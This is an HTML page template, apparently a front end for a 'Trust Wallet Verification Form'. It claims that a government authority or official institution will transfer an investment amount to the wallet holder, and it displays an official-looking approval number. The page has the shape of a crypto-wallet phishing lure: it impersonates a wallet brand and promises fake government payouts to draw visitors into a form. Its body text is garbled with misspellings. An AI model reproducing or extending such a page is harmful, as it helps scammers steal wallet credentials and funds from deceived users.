<div>
    <div class="bg-blue-500  p-5  h-96 py-6 flex w-full">
        <div class="w-1/2 content-center">
           <h3 class="text-white font-bold text-4xl animate-slide-in-left">Trust Wallet Verification Form </h3>
           <p class="text-white py-3 text-lg">For the purpose of receiving an investment amount from an official institution.</p>
           <button type="button" class="rounded-md bg-white text-blue-500 p-2 px-4 ">Get Started</button>
        </div>
        <div class="w-1/2 flex justify-center items-center  animate-slide-in-right ">
            <div class="bg-white text-blue-400 w-2/5 h-56 rounded-l-md text-center text-2xl font-bold content-center">
                <h1>Trust Wallet</h1>
            </div>
            <div class="bg-blue-700 text-white w-2/5 h-56 rounded-r-md text-center content-center text-2xl font-bold">
                <h1>Trust</h1>
            </div>
        </div>
    </div>
    <div class="text-center p-24">
           <h1 class="p-3 font-extrabold text-3xl">Trust Wallet</h1>
           <p class="py-3 text-gray-600">Wallet verification form for the purpose of receiving an investment amount from an official institution.        </p>
           <p class="text-gray-600">This form is sudmiffed for the purpose of verifying an c/ccfronic wallet registered under an individual’s name at the request of a government authority or Institution to facilitate tho transfer of a financial amount from government ontltios to the wallet holder</p>
           <p class="text-green-600">APPROVAL NO.1405-0189</p>
    </div>
    <app-form></app-form>
</div>